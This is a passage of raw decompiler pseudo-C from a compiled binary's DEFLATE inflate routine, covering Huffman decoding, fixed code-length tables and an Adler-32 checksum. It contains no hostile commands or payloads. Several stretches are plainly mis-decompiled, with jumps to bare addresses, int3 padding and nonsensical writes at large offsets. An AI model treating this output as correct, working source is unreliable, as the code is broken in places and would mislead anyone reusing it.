    																		 *(_t2870 - 0xc4) = 0;
    																		L374:
    																		L376:
    																		if(0 != 0) {
    																			goto L365;
    																		} else {
    																			 *(_t2870 - 0xc) =  *(_t2870 - 0xc4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																			_t1747 =  *(_t2870 - 8) + 8;
    																			 *(_t2870 - 8) = _t1747;
    																			if( *(_t2870 - 8) < 0xf) {
    																				goto L354;
    																			} else {
    																				goto L378;
    																			}
    																		}
    																	} else {
    																		L367:
    																		 *(_t2870 - 0x1c) = 1;
    																		_t1692 =  *(_t2870 + 8);
    																		 *_t1692 = 0x17;
    																	}
    																}
    															} else {
    																L378:
    																goto L381;
    															}
    														}
    													}
    												}
    											} else {
    												_t2086 =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    												if(_t2086 >= 2) {
    													if( *(_t2870 - 8) < 0xf) {
    														_t1747 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    														 *(_t2870 - 0xc) = _t1747;
    														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    													}
    													_t2164 =  *(_t2870 - 0xc) & 0x000003ff;
    													 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + _t2164 * 2));
    													if( *(_t2870 - 0x38) < 0) {
    														 *(_t2870 - 0x54) = 0xa;
    														do {
    															_t2164 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2164 * 0 + 0x920 + ( !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001)) * 2));
    															 *(_t2870 - 0x38) = _t2164;
    															 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
    														} while ( *(_t2870 - 0x38) < 0);
    													} else {
    														 *(_t2870 - 0x54) =  *(_t2870 - 0x38) >> 9;
    													}
    													 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
    													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x54);
    													_t1863 =  *(_t2870 - 8) -  *(_t2870 - 0x54);
    													 *(_t2870 - 8) = _t1863;
    													if(( *(_t2870 - 0x10) & 0x00000100) == 0) {
    														if( *(_t2870 - 8) < 0xf) {
    															_t1863 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    															 *(_t2870 - 0xc) = _t1863;
    															 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    															 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    														}
    														_t2171 =  *(_t2870 - 0xc) & 0x000003ff;
    														 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1863 * 0 + 0x120 + _t2171 * 2));
    														if( *(_t2870 - 0x38) < 0) {
    															 *(_t2870 - 0x54) = 0xa;
    															do {
    																_t1868 =  !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001);
    																_t2171 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2171 * 0 + 0x920 + _t1868 * 2));
    																 *(_t2870 - 0x38) = _t2171;
    																 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
    															} while ( *(_t2870 - 0x38) < 0);
    														} else {
    															_t1868 =  *(_t2870 - 0x38) >> 9;
    															 *(_t2870 - 0x54) = _t1868;
    														}
    														goto 0x140c1e;
    														asm("int3");
    														 *(_t2870 - 0xc) = _t1868 >> _t2171;
    														 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x54);
    														 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
    														_t1872 =  *(_t2870 - 0x38) & 0x00000100;
    														if(_t1872 == 0) {
    															_t2086 =  *(_t2870 - 0x14);
    															 *((char*)(_t2086 + (_t1872 << 0))) =  *(_t2870 - 0x38);
    															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 2;
    															L417:
    															goto L350;
    														} else {
    															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    															 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
    															goto L418;
    														}
    													} else {
    														L418:
    														 *(_t2870 - 0x10) =  *(_t2870 - 0x10) & 0x000001ff;
    														if( *(_t2870 - 0x10) != 0x100) {
    															_t1769 =  *(0x13ac1c +  *(_t2870 - 0x10) * 4);
    															 *(_t2870 - 0x24) = _t1769;
    															_t2180 =  *(_t2870 - 0x10);
    															_t2566 =  *(0x13b634 + _t2180 * 4);
    															 *(_t2870 - 0x10) = _t2566;
    															if( *(_t2870 - 0x24) == 0) {
    																L437:
    																if( *(_t2870 - 8) >= 0xf) {
    																	L468:
    																	_t2182 =  *((short*)( *(_t2870 + 8) + (_t1769 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																	 *(_t2870 - 0x44) = _t2182;
    																	if( *(_t2870 - 0x44) < 0) {
    																		 *(_t2870 - 0x4c) = 0xa;
    																		do {
    																			 *(_t2870 - 0x44) =  *((short*)( *(_t2870 + 8) + (_t2182 << 0) + 0x40 + 0x920 + ( !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001)) * 2));
    																			_t2182 =  *(_t2870 - 0x4c) + 1;
    																			 *(_t2870 - 0x4c) = _t2182;
    																		} while ( *(_t2870 - 0x44) < 0);
    																	} else {
    																		 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
    																		 *(_t2870 - 0x44) =  *(_t2870 - 0x44) & 0x000001ff;
    																	}
    																	 *(_t2870 - 0x28) =  *(_t2870 - 0x44);
    																	_t1769 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x4c);
    																	 *(_t2870 - 0xc) = _t1769;
    																	 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x4c);
    																	_t2566 = 0;
    																	if(0 != 0) {
    																		goto L437;
    																	} else {
    																		 *(_t2870 - 0x24) =  *(0x13b0a0 +  *(_t2870 - 0x28) * 4);
    																		_t2592 =  *(_t2870 - 0x28);
    																		_t1789 =  *(0x13b120 + _t2592 * 4);
    																		 *(_t2870 - 0x28) = _t1789;
    																		if( *(_t2870 - 0x24) == 0) {
    																			L493:
    																			 *(_t2870 - 0x7c) =  *(_t2870 - 0x14) -  *((intOrPtr*)(_t2870 + 0x14));
    																			_t2465 =  *(_t2870 - 0x28);
    																			if(_t2465 <=  *(_t2870 - 0x7c)) {
    																				L498:
    																				_t2211 = ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88)) +  *((intOrPtr*)(_t2870 + 0x14));
    																				 *(_t2870 - 0x30) = _t2211;
    																				if( *(_t2870 - 0x14) <=  *(_t2870 - 0x30)) {
    																					_t2211 =  *(_t2870 - 0x30);
    																					 *(_t2870 - 0xf4) = _t2211;
    																				} else {
    																					_t1789 =  *(_t2870 - 0x14);
    																					 *(_t2870 - 0xf4) = _t1789;
    																				}
    																				if( *(_t2870 - 0xf4) +  *(_t2870 - 0x10) <=  *((intOrPtr*)(_t2870 - 0x70))) {
    																					if( *(_t2870 - 0x10) < 9 ||  *(_t2870 - 0x10) >  *(_t2870 - 0x28)) {
    																						L522:
    																						goto L523;
    																					} else {
    																						 *((intOrPtr*)(_t2870 - 0x11c)) = ( *(_t2870 - 0x10) & 0xfffffff8) +  *(_t2870 - 0x30);
    																						do {
    																							 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2211 * 0));
    																							 *((intOrPtr*)( *(_t2870 - 0x14) + (4 << 0))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (4 << 0)));
    																							_t2211 =  *(_t2870 - 0x14) + 8;
    																							 *(_t2870 - 0x14) = _t2211;
    																							_t2612 =  *(_t2870 - 0x30) + 8;
    																							 *(_t2870 - 0x30) = _t2612;
    																							_t1789 =  *(_t2870 - 0x30);
    																						} while (_t1789 <  *((intOrPtr*)(_t2870 - 0x11c)));
    																						_t2086 =  *(_t2870 - 0x10) & 0x00000007;
    																						 *(_t2870 - 0x10) = _t2086;
    																						if( *(_t2870 - 0x10) >= 3) {
    																							do {
    																								goto L522;
    																								L523:
    																								 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t1789 * 0));
    																								 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 0)));
    																								 *((char*)( *(_t2870 - 0x14) + (1 << 1))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 1)));
    																								_t2086 =  *(_t2870 - 0x14) + 3;
    																								 *(_t2870 - 0x14) = _t2086;
    																								 *(_t2870 - 0x30) =  *(_t2870 - 0x30) + 3;
    																								_t1789 =  *(_t2870 - 0x10) - 3;
    																								 *(_t2870 - 0x10) = _t1789;
    																							} while ( *(_t2870 - 0x10) > 2);
    																							if( *(_t2870 - 0x10) > 0) {
    																								_t1798 =  *(_t2870 - 0x14);
    																								 *_t1798 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2086 * 0));
    																								if( *(_t2870 - 0x10) > 1) {
    																									 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t1798 << 0)));
    																								}
    																								_t2086 =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
    																								 *(_t2870 - 0x14) = _t2086;
    																							}
    																						} else {
    																							if( *(_t2870 - 0x10) != 0) {
    																								_t2086 =  *(_t2870 - 0x14);
    																								 *_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2612 * 0));
    																								if( *(_t2870 - 0x10) > 1) {
    																									_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t2086 << 0)));
    																									 *( *(_t2870 - 0x14) + (1 << 0)) = _t2086;
    																								}
    																								 *(_t2870 - 0x14) =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
    																							}
    																						}
    																						goto L350;
    																					}
    																					L601:
    																					 *(_t2075 + 0x5189f455) =  *(_t2075 + 0x5189f455) | _t2086;
    																					 *(_t2075 + 0x4289f045) =  *(_t2075 + 0x4289f045) | _t2086;
    																					_t2870 = _t2870;
    																					 *(_t2075 + 0x5189dc55) =  *(_t2075 + 0x5189dc55) | _t2086;
    																					 *((intOrPtr*)(_t2075 + 0x4d8b0845)) =  *((intOrPtr*)(_t2075 + 0x4d8b0845)) - _t2086;
    																					asm("cld");
    																					 *( *(_t2870 + 0x10)) = _t2465 + 1 -  *(_t2870 + 0xc);
    																					 *( *(_t2870 + 0x1c)) =  *(_t2870 - 0x14) -  *(_t2870 + 0x18);
    																					if(( *(_t2870 + 0x20) & 0x00000009) != 0 &&  *(_t2870 - 0x1c) >= 0) {
    																						 *(_t2870 - 0x58) =  *(_t2870 + 0x18);
    																						 *(_t2870 - 0x98) =  *( *(_t2870 + 0x1c));
    																						 *(_t2870 - 0x20) =  *( *(_t2870 + 8) + 0x1c) & 0x0000ffff;
    																						 *(_t2870 - 0x2c) =  *( *(_t2870 + 8) + 0x1c) >> 0x10;
    																						_t1700 =  *(_t2870 - 0x98);
    																						_t1701 = _t1700 / 0x15b0;
    																						_t2473 = _t1700 % 0x15b0;
    																						 *(_t2870 - 0xa0) = _t2473;
    																						while( *(_t2870 - 0x98) != 0) {
    																							 *(_t2870 - 0x84) = 0;
    																							while( *(_t2870 - 0x84) + 7 <  *(_t2870 - 0xa0)) {
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + _t2473 * 0) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 0)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 1)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 3) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 2)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 5) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 6) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 7) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								_t2473 =  *(_t2870 - 0x84) + 8;
    																								 *(_t2870 - 0x84) = _t2473;
    																								_t1701 =  *(_t2870 - 0x58) + 8;
    																								 *(_t2870 - 0x58) = _t1701;
    																							}
    																							while(1) {
    																								_t2097 =  *(_t2870 - 0x84);
    																								if(_t2097 >=  *(_t2870 - 0xa0)) {
    																									break;
    																								}
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x58) =  *(_t2870 - 0x58) + 1;
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								_t1701 =  *(_t2870 - 0x84) + 1;
    																								 *(_t2870 - 0x84) = _t1701;
    																							}
    																							goto 0x140d69;
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							 *(_t2870 - 0x20) = _t1701 % _t2097;
    																							_t1706 =  *(_t2870 - 0x2c);
    																							_t1701 = _t1706 / 0xfff1;
    																							 *(_t2870 - 0x2c) = _t1706 % 0xfff1;
    																							_t2473 =  *(_t2870 - 0x98) -  *(_t2870 - 0xa0);
    																							 *(_t2870 - 0x98) = _t2473;
    																							 *(_t2870 - 0xa0) = 0x15b0;
    																						}
    																						_t1704 = ( *(_t2870 - 0x2c) << 0x10) +  *(_t2870 - 0x20);
    																						_t2094 =  *(_t2870 + 8);
    																						 *((intOrPtr*)(_t2094 + 0x1c)) = _t1704;
    																						if( *(_t2870 - 0x1c) == 0 && ( *(_t2870 + 0x20) & 0x00000001) != 0) {
    																							goto 0x140d81;
    																							asm("int3");
    																							if( *((intOrPtr*)(_t1704 + 0x1c)) !=  *((intOrPtr*)(_t2094 + 0x10))) {
    																								 *(_t2870 - 0x1c) = 0xfffffffe;
    																							}
    																						}
    																					}
    																					_t1688 =  *(_t2870 - 0x1c);
    																					goto L622;
    																				} else {
    																					goto L502;
    																				}
    																			} else {
    																				_t1789 =  *(_t2870 + 0x20) & 0x00000004;
    																				if(_t1789 == 0) {
    																					goto L498;
    																				} else {
    																					L495:
    																					 *(_t2870 - 0x1c) = 0xffffffff;
    																					_t2086 =  *(_t2870 + 8);
    																					 *_t2086 = 0x25;
    																				}
    																			}
    																		} else {
    																			L476:
    																			_t2233 =  *(_t2870 - 8);
    																			if(_t2233 >=  *(_t2870 - 0x24)) {
    																				L490:
    																				goto 0x140cba;
    																				asm("int3");
    																				asm("int3");
    																				asm("int3");
    																				 *(_t2870 - 0x120) = (_t2592 << _t2233) - 0x00000001 &  *(_t2870 - 0xc);
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																				 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																				_t2592 = 0;
    																				if(0 != 0) {
    																					goto L476;
    																				} else {
    																					_t1789 =  *(_t2870 - 0x28) +  *(_t2870 - 0x120);
    																					 *(_t2870 - 0x28) = _t1789;
    																					goto L493;
    																				}
    																			} else {
    																				L477:
    																				_t2465 =  *(_t2870 - 4);
    																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xdc) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L488;
    																				} else {
    																					L478:
    																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t1692 == 0) {
    																						 *(_t2870 - 0xdc) = 0;
    																						L486:
    																						L488:
    																						if(0 != 0) {
    																							goto L477;
    																						} else {
    																							_t2592 =  *(_t2870 - 0xdc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 0xc) = _t2592;
    																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																							_t2233 =  *(_t2870 - 8);
    																							if(_t2233 <  *(_t2870 - 0x24)) {
    																								goto L477;
    																							} else {
    																								goto L490;
    																							}
    																						}
    																					} else {
    																						L479:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t2086 =  *(_t2870 + 8);
    																						 *_t2086 = 0x1b;
    																					}
    																				}
    																			}
    																		}
    																	}
    																} else {
    																	_t2190 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																	if(_t2190 >= 2) {
    																		_t1769 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    																		 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2190 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    																		 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    																		goto L468;
    																	} else {
    																		L439:
    																		_t1769 =  *((short*)( *(_t2870 + 8) + (_t2566 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																		 *(_t2870 - 0x44) = _t1769;
    																		if( *(_t2870 - 0x44) < 0) {
    																			if( *(_t2870 - 8) <= 0xa) {
    																				goto L452;
    																			} else {
    																				 *(_t2870 - 0x4c) = 0xa;
    																				do {
    																					_t2588 =  *(_t2870 + 8) + (_t1769 << 0) + 0x40;
    																					_t1769 =  !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001);
    																					 *(_t2870 - 0x44) =  *((short*)(_t2588 + 0x920 + _t1769 * 2));
    																					 *(_t2870 - 0x4c) =  *(_t2870 - 0x4c) + 1;
    																					if( *(_t2870 - 0x44) < 0) {
    																						goto L449;
    																					}
    																					break;
    																					L449:
    																					_t1769 =  *(_t2870 - 0x4c) + 1;
    																				} while ( *(_t2870 - 8) >= _t1769);
    																				if( *(_t2870 - 0x44) < 0) {
    																					goto L452;
    																				} else {
    																					goto L465;
    																				}
    																			}
    																		} else {
    																			 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
    																			if( *(_t2870 - 0x4c) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x4c)) {
    																				L452:
    																				_t2086 =  *(_t2870 - 4);
    																				if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xd4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L463;
    																				} else {
    																					L453:
    																					_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t2465 == 0) {
    																						 *(_t2870 - 0xd4) = 0;
    																						L461:
    																						L463:
    																						if(0 != 0) {
    																							goto L452;
    																						} else {
    																							_t2566 =  *(_t2870 - 0xd4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 0xc) = _t2566;
    																							_t1769 =  *(_t2870 - 8) + 8;
    																							 *(_t2870 - 8) = _t1769;
    																							if( *(_t2870 - 8) < 0xf) {
    																								goto L439;
    																							} else {
    																								goto L465;
    																							}
    																						}
    																					} else {
    																						L454:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t1692 =  *(_t2870 + 8);
    																						 *_t1692 = 0x1a;
    																					}
    																				}
    																			} else {
    																				L465:
    																				goto L468;
    																			}
    																		}
    																	}
    																}
    															} else {
    																L421:
    																if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
    																	L435:
    																	goto 0x140c45;
    																	asm("int3");
    																	asm("int3");
    																	asm("int3");
    																	 *(_t2870 - 0x124) = (_t2566 << _t2180) - 0x00000001 &  *(_t2870 - 0xc);
    																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																	_t2180 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																	 *(_t2870 - 8) = _t2180;
    																	_t2566 = 0;
    																	if(0 != 0) {
    																		goto L421;
    																	} else {
    																		_t1769 =  *(_t2870 - 0x10) +  *(_t2870 - 0x124);
    																		 *(_t2870 - 0x10) = _t1769;
    																		goto L437;
    																	}
    																} else {
    																	L422:
    																	_t2086 =  *(_t2870 - 4);
    																	if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																		 *(_t2870 - 0xa4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																		goto L433;
    																	} else {
    																		L423:
    																		_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																		if(_t2465 == 0) {
    																			 *(_t2870 - 0xa4) = 0;
    																			L431:
    																			L433:
    																			if(0 != 0) {
    																				goto L422;
    																			} else {
    																				_t2566 =  *(_t2870 - 0xa4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																				 *(_t2870 - 0xc) = _t2566;
    																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																				_t2180 =  *(_t2870 - 8);
    																				if(_t2180 <  *(_t2870 - 0x24)) {
    																					goto L422;
    																				} else {
    																					goto L435;
    																				}
    																			}
    																		} else {
    																			L424:
    																			 *(_t2870 - 0x1c) = 1;
    																			_t1692 =  *(_t2870 + 8);
    																			 *_t1692 = 0x19;
    																		}
    																	}
    																}
    															}
    														} else {
    															L531:
    															_t1692 =  *( *(_t2870 + 8) + 0x14) & 0x00000001;
    															if(_t1692 == 0) {
    																L48:
    																if( *(_t2870 - 8) >= 3) {
    																	L62:
    																	 *( *(_t2870 + 8) + 0x14) =  *(_t2870 - 0xc) & 0x00000007;
    																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 3;
    																	 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
    																	if(0 != 0) {
    																		goto L48;
    																	} else {
    																		 *( *(_t2870 + 8) + 0x18) =  *( *(_t2870 + 8) + 0x14) >> 1;
    																		_t1692 =  *(_t2870 + 8);
    																		if( *((intOrPtr*)(_t1692 + 0x18)) != 0) {
    																			_t2086 =  *(_t2870 + 8);
    																			if( *((intOrPtr*)(_t2086 + 0x18)) != 3) {
    																				if( *( *(_t2870 + 8) + 0x18) != 1) {
    																					 *(_t2870 - 0x10) = 0;
    																					L189:
    																					if( *(_t2870 - 0x10) >= 3) {
    																						goto 0x140a5e;
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						_push( *(_t2870 + 8) + (_t1692 << 1) + 0x40);
    																						_t1743 =  *( *0x00CE9D9D)();
    																						_t2873 = _t2873 + 0xc;
    																						 *(_t2870 - 0x10) = 0;
    																						L210:
    																						_t2136 =  *(_t2870 + 8);
    																						if( *(_t2870 - 0x10) >=  *((intOrPtr*)(_t2136 + (_t1743 << 1) + 0x2c))) {
    																							 *((intOrPtr*)( *(_t2870 + 8) + (_t2136 << 1) + 0x2c)) = 0x13;
    																							goto L231;
    																						} else {
    																							L212:
    																							if( *(_t2870 - 8) >= 3) {
    																								L226:
    																								 *(_t2870 - 0x114) =  *(_t2870 - 0xc) & 0x00000007;
    																								_t1987 =  *(_t2870 - 0xc) >> 3;
    																								 *(_t2870 - 0xc) = _t1987;
    																								 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
    																								if(0 != 0) {
    																									goto L212;
    																								} else {
    																									_t1743 =  *(_t2870 - 0x114);
    																									 *( *(_t2870 + 8) + (_t1987 << 1) + 0x40 + ( *( *(_t2870 - 0x10) + 0x13ba14) & 0x000000ff)) = _t1743;
    																									 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
    																									goto L210;
    																								}
    																							} else {
    																								L213:
    																								_t1692 =  *(_t2870 - 4);
    																								if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																									 *(_t2870 - 0xc0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																									goto L224;
    																								} else {
    																									L214:
    																									_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																									if(_t2086 == 0) {
    																										 *(_t2870 - 0xc0) = 0;
    																										L222:
    																										L224:
    																										if(0 != 0) {
    																											goto L213;
    																										} else {
    																											 *(_t2870 - 0xc) =  *(_t2870 - 0xc0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																											if( *(_t2870 - 8) < 3) {
    																												goto L213;
    																											} else {
    																												goto L226;
    																											}
    																										}
    																									} else {
    																										L215:
    																										 *(_t2870 - 0x1c) = 1;
    																										_t2465 =  *(_t2870 + 8);
    																										 *_t2465 = 0xe;
    																									}
    																								}
    																							}
    																						}
    																					} else {
    																						L190:
    																						_t428 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
    																						if( *(_t2870 - 8) >=  *_t428) {
    																							L204:
    																							_t456 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
    																							 *( *(_t2870 + 8) + 0x2c +  *(_t2870 - 0x10) * 4) = (0x00000001 <<  *_t456) - 0x00000001 &  *(_t2870 - 0xc);
    																							_t464 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
    																							 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *_t464;
    																							_t468 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
    																							_t2759 =  *_t468;
    																							_t2000 =  *(_t2870 - 8) - _t2759;
    																							 *(_t2870 - 8) = _t2000;
    																							if(0 != 0) {
    																								goto L190;
    																							} else {
    																								goto 0x140a4a;
    																								asm("int3");
    																								_t1692 =  *(_t2870 - 0x10);
    																								 *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1692 * 4)) =  *((intOrPtr*)(_t2000 + 0x2c + _t2759 * 4)) +  *((intOrPtr*)(0x13ba28 +  *(_t2870 - 0x10) * 4));
    																								 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
    																								goto L189;
    																							}
    																						} else {
    																							L191:
    																							_t2465 =  *(_t2870 - 4);
    																							if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																								 *(_t2870 - 0xe0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																								goto L202;
    																							} else {
    																								L192:
    																								_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																								if(_t1692 == 0) {
    																									 *(_t2870 - 0xe0) = 0;
    																									L200:
    																									L202:
    																									if(0 != 0) {
    																										goto L191;
    																									} else {
    																										 *(_t2870 - 0xc) =  *(_t2870 - 0xe0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																										 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																										_t453 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
    																										if( *(_t2870 - 8) <  *_t453) {
    																											goto L191;
    																										} else {
    																											goto L204;
    																										}
    																									}
    																								} else {
    																									L193:
    																									 *(_t2870 - 0x1c) = 1;
    																									_t2086 =  *(_t2870 + 8);
    																									 *_t2086 = 0xb;
    																								}
    																							}
    																						}
    																					}
    																				} else {
    																					 *(_t2870 - 0x60) =  *(_t2870 + 8) + 0x40 + _t1692 * 0;
    																					 *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) = 0x120;
    																					 *( *(_t2870 + 8) + 0xbadbd9) = 0x20;
    																					_push(0x20);
    																					_push(5);
    																					_push( *(_t2870 + 8) + 0xbadbed);
    																					_t2086 =  *0x00CE9D9D;
    																					 *_t2086();
    																					_t2873 = _t2873 + 0xc;
    																					 *(_t2870 - 0x5c) = 0;
    																					while( *(_t2870 - 0x5c) <= 0x8f) {
    																						 *( *(_t2870 - 0x60)) = 8;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0xff) {
    																						 *( *(_t2870 - 0x60)) = 9;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0x117) {
    																						 *( *(_t2870 - 0x60)) = 7;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
